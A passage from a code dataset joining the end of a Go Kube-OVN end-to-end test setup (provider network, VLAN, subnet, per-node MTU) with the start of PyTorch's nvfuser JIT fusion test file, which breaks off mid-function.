underlay.AddNodeRoutes(node, fmt.Sprintf("default via %s ", network.Gateway))
if underlayGateway == "" {
underlayGateway = network.Gateway
}
}
if network.IPv6Gateway != "" {
underlay.AddNodeRoutes(node, fmt.Sprintf("default via %s ", network.IPv6Gateway))
}
}
underlay.SetCIDR(underlayCIDR)
cniPods, err := f.KubeClientSet.CoreV1().Pods("kube-system").List(context.Background(), metav1.ListOptions{LabelSelector: "app=kube-ovn-cni"})
if err != nil {
Fail(err.Error())
}
for i := range nodes.Items {
var cniPod *corev1.Pod
nodeIPv4, nodeIPv6 := util.GetNodeInternalIP(nodes.Items[i])
for _, pod := range cniPods.Items {
if pod.Status.HostIP == nodeIPv4 || pod.Status.HostIP == nodeIPv6 {
cniPod = &pod
break
}
}
if cniPod == nil {
Fail("failed to get CNI pod on node " + nodes.Items[i].Name)
return nil
}
// change MTU
mtu := 1500 - (i+1)*5
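// each node gets a distinct MTU (1495, 1490, ...), presumably so the underlay tests can verify per-node MTU handling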
cmd := fmt.Sprintf("ip link set %s mtu %d", providerInterface, mtu)
if _, _, err = f.ExecToPodThroughAPI(cmd, "cni-server", cniPod.Name, cniPod.Namespace, nil); err != nil {
Fail(fmt.Sprintf("failed to set MTU of %s on node %s: %v", providerInterface, nodes.Items[i].Name, err))
}
underlay.SetNodeMTU(nodes.Items[i].Name, mtu)
}
ns := corev1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Namespace,
Labels: map[string]string{"e2e": "true"},
},
}
if _, err = f.KubeClientSet.CoreV1().Namespaces().Create(context.Background(), &ns, metav1.CreateOptions{}); err != nil {
Fail(err.Error())
}
// create provider network
pn := &kubeovn.ProviderNetwork{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.ProviderNetwork,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.ProviderNetworkSpec{
DefaultInterface: providerInterface,
},
}
if _, err = f.OvnClientSet.KubeovnV1().ProviderNetworks().Create(context.Background(), pn, metav1.CreateOptions{}); err != nil {
Fail("failed to create provider network: " + err.Error())
}
if err = f.WaitProviderNetworkReady(pn.Name); err != nil {
Fail("provider network failed: " + err.Error())
}
if pn, err = f.OvnClientSet.KubeovnV1().ProviderNetworks().Get(context.Background(), pn.Name, metav1.GetOptions{}); err != nil {
Fail("failed to get provider network: " + err.Error())
}
for _, node := range nodes.Items {
if !pn.Status.NodeIsReady(node.Name) {
Fail(fmt.Sprintf("provider network on node %s is not ready", node.Name))
}
}
// create vlan
vlan := kubeovn.Vlan{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Vlan,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.VlanSpec{
ID: vlanID,
Provider: pn.Name,
},
}
if _, err = f.OvnClientSet.KubeovnV1().Vlans().Create(context.Background(), &vlan, metav1.CreateOptions{}); err != nil {
Fail("failed to create vlan: " + err.Error())
}
// create subnet
subnet := kubeovn.Subnet{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Subnet,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.SubnetSpec{
CIDRBlock: underlayCIDR,
Gateway: underlayGateway,
ExcludeIps: underlayNodeIPs,
Vlan: vlan.Name,
Namespaces: []string{underlay.Namespace},
Protocol: util.CheckProtocol(underlayCIDR),
},
}
if _, err = f.OvnClientSet.KubeovnV1().Subnets().Create(context.Background(), &subnet, metav1.CreateOptions{}); err != nil {
Fail("failed to create subnet: " + err.Error())
}
if err = f.WaitSubnetReady(subnet.Name); err != nil {
Fail("subnet failed: " + err.Error())
}
return nil
}, func(data []byte) {})
|
[
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
test/test_jit_cuda_fuser.py
|
# Owner(s): ["oncall: jit"]
import unittest
import os
import random
import enum
import copy
from functools import reduce
import operator
import warnings
import torch
from torch.nn import functional
from torch.profiler import profile, ProfilerActivity
from torch.testing._internal.codegen.random_topo_test import runDefaultTestWithSeed
from torch.testing._internal.common_cuda import TEST_MULTIGPU
from torch.testing._internal.common_device_type import instantiate_device_type_tests, ops, OpDTypes
from torch.testing._internal.common_jit import JitCommonTestCase
from torch.testing._internal.common_methods_invocations import op_db, SampleInput
from torch.testing._internal.common_utils import run_tests, ProfilingMode, GRAPH_EXECUTOR, TEST_WITH_ROCM, slowTest, \
is_iterable_of_tensors, freeze_rng_state
from torch.testing._internal.jit_utils import clone_inputs, get_traced_sample_variant_pairs, JitTestCase, RUN_CUDA
from torch.testing._internal.jit_metaprogramming_utils import create_traced_fn
from torch.testing import FileCheck
from jit.test_fuser_common import TestFuserCommon # noqa: F401
import itertools
import numpy as np
import math
from torch.autograd.gradcheck import gradcheck
from typing import List
RUN_NVFUSER = RUN_CUDA and not TEST_WITH_ROCM
CUDA_MAJOR, CUDA_MINOR = 0, 0
if RUN_NVFUSER and torch.version.cuda is not None:
CUDA_MAJOR, CUDA_MINOR = (int(x) for x in torch.version.cuda.split('.')[:2])
os.environ['PYTORCH_NVFUSER_DISABLE_FALLBACK'] = '1'
os.environ['PYTORCH_NVFUSER_DISABLE_FMA'] = '1'
os.environ['PYTORCH_NVFUSER_DISABLE_FASTMATH'] = '1'
os.environ['PYTORCH_NVFUSER_JIT_OPT_LEVEL'] = '0'
os.environ['PYTORCH_NVFUSER_DISABLE_RNG_UNROLL'] = '1'
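# These nvfuser environment variables are set up front so the whole run executes with fallback,
# FMA, fast math, JIT optimization, and RNG unrolling disabled (as the names suggest); presumably
# they have to be in place before the fuser compiles anything.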
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(True)
FUSION_GROUP = 'prim::CudaFusionGroup'
FUSION_GUARD = 'prim::CudaFusionGuard'
import contextlib
@contextlib.contextmanager
def nvfuser_singleton_fusion(flag):
old_value = torch._C._jit_set_nvfuser_single_node_mode(flag)
try:
yield
finally:
torch._C._jit_set_nvfuser_single_node_mode(old_value)
@contextlib.contextmanager
def nvfuser_horizontal_fusion(flag):
old_value = torch._C._jit_set_nvfuser_horizontal_mode(flag)
try:
yield
finally:
torch._C._jit_set_nvfuser_horizontal_mode(old_value)
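# is_pre_volta: compute capability major < 7 means a pre-Volta GPU (Volta is sm_70); several
# tests below skip on such devices because nvfuser reductions are not supported there.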
def is_pre_volta():
if not RUN_NVFUSER:
return False
prop = torch.cuda.get_device_properties(torch.cuda.current_device())
return prop.major < 7
TEST_BF16 = RUN_NVFUSER and torch.cuda.is_bf16_supported()
class CudaFuserTestOptions():
def __init__(self):
self.old_cpu_fuse = torch._C._jit_can_fuse_on_cpu()
self.old_gpu_fuse = torch._C._jit_can_fuse_on_gpu()
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
self.old_guard = torch._C._jit_set_nvfuser_guard_mode(False)
torch._C._debug_set_autodiff_subgraph_inlining(False)
self.old_value = torch._C._jit_set_autocast_mode(True)
if(RUN_CUDA):
self.old_nvfuser = torch._C._jit_set_nvfuser_enabled(True)
def restore(self):
if(RUN_CUDA):
torch._C._jit_set_nvfuser_enabled(self.old_nvfuser)
torch._C._jit_override_can_fuse_on_cpu(self.old_cpu_fuse)
torch._C._jit_override_can_fuse_on_gpu(self.old_gpu_fuse)
torch._C._jit_set_nvfuser_guard_mode(self.old_guard)
torch._C._debug_set_autodiff_subgraph_inlining(True)
torch._C._jit_set_autocast_mode(self.old_value)
class TestCudaFuser(JitTestCase):
def assertEqual(self, *args, **kwargs):
kwargs["exact_layout"] = True
super(JitTestCase, self).assertEqual(*args, **kwargs)
def _getSubgraphInFusion(self, graph):
num_node = 0
subgraph = None
def count(block, ret):
for n in block.nodes():
if n.kind() == FUSION_GROUP:
ret[0] = ret[0] + 1
self.assertTrue(n.hasAttribute('Subgraph'))
ret[1] = n.g('Subgraph')
for block in n.blocks():
count(block, ret)
ret = [num_node, subgraph]
count(graph, ret)
self.assertEqual(ret[0], 1)
return ret[1]
def setUp(self):
super(TestCudaFuser, self).setUp()
self.skip_node_list = []
disabled_ops = ("aten::batch_norm",
"aten::_batch_norm_impl_index",
"aten::_batch_norm_impl_index_backward",
"aten::native_batch_norm_backward")
for op in disabled_ops:
disabled_flag = torch._C._jit_set_nvfuser_skip_node_kind(op, False)
if disabled_flag:
torch._C._jit_set_nvfuser_skip_node_kind(op, True)
self.skip_node_list.append(op)
# fall back to CPU to avoid errors in case this is run on a CPU-only machine
dev = 'cuda' if RUN_NVFUSER else 'cpu'
self.special_values = torch.tensor(
[float("-inf"), -10, -math.pi,
-1, -0.5, 0, 1, 0.5,
math.pi, 10, float("inf"),
float("nan")], dtype=torch.float, device=dev)
self.int_types = [
torch.int8,
torch.uint8,
torch.int16,
torch.int32,
torch.int64
]
self.support_tensor_dtypes = [
torch.int32,
torch.int64,
torch.float16,
torch.float32,
torch.float64,
torch.bool
]
if TEST_BF16:
self.support_tensor_dtypes.append(torch.bfloat16)
if(RUN_NVFUSER):
self.cuda_fuser_options = CudaFuserTestOptions()
def tearDown(self):
# restore the skip-node configuration to its pre-test state
for op in self.skip_node_list:
disabled_flag = torch._C._jit_set_nvfuser_skip_node_kind(op, False)
if not disabled_flag:
torch._C._jit_set_nvfuser_skip_node_kind(op, True)
if(RUN_NVFUSER):
self.cuda_fuser_options.restore()
super(TestCudaFuser, self).tearDown()
def _run_helper(self, jit_op, op, *args):
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
torch.cuda.manual_seed_all(123)
o = op(*args)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContainsExactly(jit_op.graph_for(*args), FUSION_GUARD, 1, consider_subgraphs=True)
def _run_training_helper(self, jit_op, op, grads, *args):
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
o = op(*args)
g = o.backward(grads)
self.assertEqual(o, jit_o)
self.assertEqual(g, jit_g)
self.assertGraphContainsExactly(jit_op.graph_for(*args), FUSION_GUARD, 1, consider_subgraphs=True)
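# Dig the backward graph out of the grad executor's execution plan so the fusion guard can be
# asserted on the backward pass as well.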
bwd_graph = list(
list(jit_op.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
self.assertGraphContainsExactly(bwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_half(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: float):
o_16 = torch.add(x, y)
o_32_a = torch.add(y, z, alpha=alpha)
o_32_b = torch.add(o_16, z)
return (o_16, o_32_a, o_32_b)
t_jit = torch.jit.script(t)
alpha = 0.5
# stick to integers; this avoids numerical differences due to our
# promotion
x = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
y = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
z = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
o = t(x, y, z, alpha)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z, alpha), FUSION_GUARD)
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_bfloat(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: float):
o_16 = torch.add(x, y)
o_32_a = torch.add(y, z, alpha=alpha)
o_32_b = torch.add(o_16, z)
return (o_16, o_32_a, o_32_b)
t_jit = torch.jit.script(t)
alpha = 0.5
# stick to integers; this avoids numerical differences due to our
# promotion
x = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
y = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
z = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
o = t(x, y, z, alpha)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z, alpha), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_const(self):
def t(x, y):
o = x + y
o = o + 2.0
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_chunk(self):
def t(x, y, z, q):
o = x + q
x0, x1 = torch.chunk(o, 2)
o = x0 + x1
o = o + y
o = o * z
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(2, 8, dtype=torch.float, device="cuda")
z = torch.randn(2, 8, dtype=torch.float, device="cuda")
q = torch.randn(4, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z, q)
jit_o = t_jit(x, y, z, q)
o = t(x, y, z, q)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z, q), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported on pre-Volta devices")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_dtypes_axis(self):
for op in [torch.sum, torch.mean, torch.amax, torch.var, torch.std]:
for dtype in [torch.float16, torch.float32, torch.double]:
for axis in [-1, 2, 0]:
def make_func(op):
def func(x: torch.Tensor):
o = torch.mul(x, 2.0)
o = op(o, dim=[axis])
return o
return func
x = torch.randn(8, 4, 16, dtype=dtype, device="cuda")
t = make_func(op)
t_jit = torch.jit.trace(t, x)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported on pre-Volta devices")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_variance(self):
for op in [torch.var, torch.std]:
for dtype in [torch.float16, torch.float32, torch.double]:
for axis in [-2, -1, 2, 1]:
for unbiased in [False, True]:
def make_func(op):
def func(x: torch.Tensor):
o = torch.mul(x, 2.0)
o = op(o, dim=[axis])
return o
return func
x = torch.randn(8, 4, 16, dtype=dtype, device="cuda")
t = make_func(op)
t_jit = torch.jit.trace(t, x)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_input(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 1, 32, dtype=torch.float, device="cuda")
y = y.expand(4, 8, 32, 32)
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_0(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_1(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(1, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_2(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 1, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(8, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_3(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(8, 17, 8, dtype=torch.float, device="cuda")
y = torch.randn(8, 17, 1, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
# test_broadcasting_partition_logic_X
# Tests that the partition logic avoids creating unsupported
# broadcasting semantics in a CudaFusionGroup
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_partition_logic_0(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
x = x + 12.0
o1 = x + y
o2 = x + z
o = o1 + o2
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 6, 8, dtype=torch.float32, device="cuda")
y = torch.randn(8, 6, 8, dtype=torch.float32, device="cuda")
z = torch.randn(6, 8, dtype=torch.float32, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, z))
self.assertGraphContainsExactly(subgraph, 'aten::add', 4, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_partition_logic_1(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
x = x + 12.0
o1 = x + y
o2 = x + z
o = o1 + o2
return o
t_jit = torch.jit.script(t)
x = torch.randn(8, 6, 8, dtype=torch.float32, device="cuda")
y = torch.randn(4, 8, 6, 8, dtype=torch.float32, device="cuda")
z = torch.randn(4, 1, 6, 8, dtype=torch.float32, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, z))
self.assertGraphContainsExactly(subgraph, 'aten::add', 4, consider_subgraphs=False)
@unittest.skipIf(True, "Broadcast with different output not supported yet")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_multiple_output_shape(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = x + 12
o1 = o + y
o2 = o + z
oo = o1.sum() + o2.sum()
return oo
t_jit = torch.jit.script(t)
x = torch.randn(32, 32, dtype=torch.float, device="cuda")
y = torch.randn(2, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
# Currently cannot fuse this
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(True, "broadcast on branches can't be resolved yet")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_multiple_output(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
o = x + 12
o1 = o + y
o2 = o + z
oo = o1.sum() + o2.sum()
return oo
t_jit = torch.jit.script(t)
x = torch.randn(32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
# Currently cannot fuse this
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
def _unary_test_helper(self, operation, dtype, random_data):
gradient_check = (dtype == torch.float64) and random_data
shape = (8, 7)
torch.cuda.manual_seed_all(211)
# need additional def of t for boolean ops
def t(x: torch.Tensor, y: torch.Tensor):
o = x * y
o = o + 5e-3
o = operation(o)
return o
y = torch.rand(shape, dtype=torch.float32, device="cuda", requires_grad=gradient_check)
y = y.to(dtype=dtype)
if random_data:
x = torch.rand(shape, dtype=torch.float32, device="cuda", requires_grad=gradient_check)
if dtype in self.int_types:
# prefer a larger variance for integer types
x = x * 5
x = x.to(dtype=dtype)
else:
x = self.special_values.to(dtype=dtype)
try:
ref = t(x, y)
except Exception:
# same approach as the TE checker: if eager mode throws, skip this case
return
t_jit = torch.jit.script(t)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
if gradient_check:
if jit_o.dtype != torch.bool:
# bool dtype has no `-`
gradcheck(t_jit, [x, y], nondet_tol=1e-5)
elif dtype in self.support_tensor_dtypes:
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
o = t(x, y)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("failing case {}\n{}\n{}\n{}".format(dtype, operation, x, y), o, jit_o, 1e-2))
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unary_ops(self):
data_types = [
*self.int_types,
torch.float16,
torch.float32,
torch.float64
]
if TEST_BF16:
data_types.append(torch.bfloat16)
operations = [torch.neg,
torch.abs,
torch.log,
torch.log10,
torch.log1p,
torch.log2,
torch.lgamma,
torch.exp,
torch.expm1,
torch.erf,
torch.erfc,
torch.cos,
torch.acos,
torch.cosh,
torch.sin,
torch.asin,
torch.sinh,
torch.tan,
torch.atan,
torch.sqrt,
torch.rsqrt,
torch.ceil,
torch.floor,
torch.round,
torch.trunc,
torch.frac,
torch.reciprocal,
torch.isfinite,
torch.isinf,
torch.isnan,
torch.isneginf,
torch.isposinf,
torch.isreal,
torch.nn.functional.softplus,
torch.nn.functional.gelu,
torch.relu,
torch.sigmoid,
torch.bitwise_not,
torch.tan,
torch.tanh,
torch.nn.functional.silu]
for op, dtype in itertools.product(operations, data_types):
self._unary_test_helper(op, dtype, False) # test special numbers
self._unary_test_helper(op, dtype, True) # test random data
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_category_rule(self):
def run_tensor(x, z):
def t(x: torch.Tensor, z: torch.Tensor):
o = x + z
o = torch.abs(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, z)
jit_o = t_jit(x, z)
o = t(x, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, z), FUSION_GUARD)
def run_scalar(x, z):
def t(x: torch.Tensor, z: float):
o = x + z
o = torch.abs(o)
return o
t_jit = torch.jit.script(t)
jit_o = t_jit(x, z)
jit_o = t_jit(x, z)
o = t(x, z)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, z), FUSION_GUARD)
# n-dim with 0-dim (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.tensor(2.0, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with 0-dim (type-promote)
x = torch.randn(4, 8, 32, 32, device="cuda").to(dtype=torch.long)
z = torch.tensor(2.0, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with n-dim (type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
z = torch.randn(4, 8, 32, 32, dtype=torch.double, device="cuda")
run_tensor(x, z)
# n-dim with scalar (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.float16, device="cuda")
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
if TEST_BF16:
# n-dim with scalar (no type-promote)
x = torch.randn(4, 8, 32, 32, dtype=torch.bfloat16, device="cuda")
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
# n-dim with scalar (type-promote)
x = torch.randn(4, 8, 32, 32, device="cuda").to(dtype=torch.long)
z = torch.tensor(3., dtype=torch.double)
run_scalar(x, z)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_unary_bitwise(self):
def bit_not(x: torch.Tensor):
return ~(x + 1)
jitted = torch.jit.script(bit_not)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda").mul(5).to(torch.long)
jit_o = bit_not(x)
jit_o = bit_not(x)
o = bit_not(x)
self.assertEqual(o, jit_o)
jitted.graph_for(x) # Shows up in second instance, not first
self.assertGraphContains(jitted.graph_for(x), FUSION_GUARD)
def bool_not(x: torch.Tensor, y: torch.Tensor):
return ~(x & y)
jitted = torch.jit.script(bool_not)
x = torch.rand(4, 8, 32, 32, dtype=torch.float, device="cuda").round().to(torch.bool)
y = torch.rand(4, 8, 32, 32, dtype=torch.float, device="cuda").round().to(torch.bool)
jit_o = bool_not(x, y)
jit_o = bool_not(x, y)
o = bool_not(x, y)
self.assertEqual(o, jit_o)
jitted.graph_for(x, y) # Shows up in second instance, not first
self.assertGraphContains(jitted.graph_for(x, y), FUSION_GUARD)
def _get_scalar_binary_test_fn(self, category_and_type1, category_and_type2, operation):
category1, dtype_arg1 = category_and_type1
category2, dtype_arg2 = category_and_type2
def t_intx_tensory(x: int, y: torch.Tensor):
o = operation(x, y)
o = 2 + o
return o
def t_doublex_tensory(x: float, y: torch.Tensor):
o = operation(x, y)
o = 2 + o
return o
# Omit both scalar cases and swap cases
assert category1 == "scalar" and category2 != "scalar"
if dtype_arg1.is_floating_point:
return t_doublex_tensory
if dtype_arg1 == torch.int64 or dtype_arg1 == torch.int32:
return t_intx_tensory
raise NotImplementedError
def _binary_test_helper(self, operation, dtypes, random_data, categories="ndim"):
if isinstance(dtypes, tuple):
dtype_arg1, dtype_arg2 = dtypes
else:
dtype_arg1 = dtype_arg2 = dtypes
if isinstance(categories, tuple) and random_data:
category1, category2 = categories
elif not random_data:
